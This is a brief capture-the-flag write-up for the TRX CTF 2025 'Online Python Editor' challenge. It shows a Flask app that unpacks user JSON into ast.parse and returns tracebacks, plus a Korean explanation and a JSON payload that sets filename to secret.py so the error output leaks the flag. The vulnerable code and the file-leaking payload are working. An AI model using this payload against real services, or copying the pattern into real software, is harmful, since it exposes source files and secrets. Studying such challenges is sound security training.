TRX CTF 2025

Online Python Editor

# app.py
import ast
import traceback
from flask import Flask, render_template, request

app = Flask(__name__)

@app.get("/")
def home():
    return render_template("index.html")

@app.post("/check")
def check():
    try:
        ast.parse(**request.json)
        return {"status": True, "error": None}
    except Exception:
        return {"status": False, "error": traceback.format_exc()}
        
if __name__ == '__main__':
    app.run(debug=True)

 

# secret.py
def main():
    print("Here's the flag: ")
    print(FLAG) 
    
FLAG = "TRX{fake_flag_for_testing}"

main()

 

ast.parse 함수에 filename에 secret.py를 넘겨서, FLAG를 유출할 수 있다.

https://docs.python.org/3/library/ast.html#ast.parse

{
  "source": "\n\n\n\n\nprint(",
  "filename": "secret.py"
}